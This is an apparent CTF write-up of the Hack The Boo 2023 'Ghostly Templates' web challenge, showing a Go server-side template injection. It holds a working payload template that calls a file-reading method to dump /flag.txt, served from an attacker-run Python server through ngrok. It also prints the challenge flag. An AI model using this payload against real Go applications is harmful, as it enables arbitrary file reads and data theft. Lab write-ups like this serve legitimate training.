Post

Ghostly Templates

Challenge

  • CTF: Hack The Boo 2023
  • Name: Ghostly Templates
  • Category: Web
  • Difficulty: Medium
  • Points: 325
  • Description: In the dark corners of the internet, a mysterious website has been making waves among the cybersecurity community. This site, known for its Halloween-themed templates, has sparked rumors of an eerie secret lurking beneath the surface. Will you delve into this dark and spooky webapp to uncover the hidden truth?
  • Objective: Golang SSTI

Files

Download: web_ghostlytemplates.zip

Writeup

Lets spin-up the docker image of the web and setup our static-code analysis IDE:

1
2
code .
sudo ./build_docker.sh

Browsing to the local webpage: http://127.0.0.1:1337/, we are greeted with a login page: ghostlytemplates_1

Browsing the main.go source code, we find a function OutFileContents() that can read a file and return the data.

1
2
3
4
5
6
7
func (p RequestData) OutFileContents(filePath string) string {
	data, err := os.ReadFile(filePath)
	if err != nil {
		return err.Error()
	}
	return string(data)
}

Controlling the template page loaded, create a template file (i.e. bad.tpl) and host it on a python3 webserver. Call the OutFileContents() golang function to read the flag.

1
2
3
4
5
6
7
8
9
10
11
12
<!DOCTYPE html>
<html lang="en">
<head>
    <title>Bad Go</title>
</head>
<body>
    <h2>Get Flag</h2>
    <ul>
        <li>Flag: {{ .OutFileContents "/flag.txt"}}</li>
    </ul>
</body>
</html>
1
2
3
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
127.0.0.1 - - [27/Oct/2023 21:46:43] "GET /bad.tpl HTTP/1.1" 200 -

Spinning up a docker instance and sending the same payload, we can then obtain the real flag. Make your localhost webserver accessible via ngrok so the HTB docker challenge endpoint can reach it. Entering the address of our template into the input field, the template is pulled and run through the template engine. This will call the function and display the flag:

1
2
Get Flag
    Flag: HTB{t3mpl14t35_c4n_c4us3_p41n__4nd_f1l35_1nclud3d!}

Flag: HTB{t3mpl14t35_c4n_c4us3_p41n__4nd_f1l35_1nclud3d!}

This post is licensed under CC BY 4.0 by the author.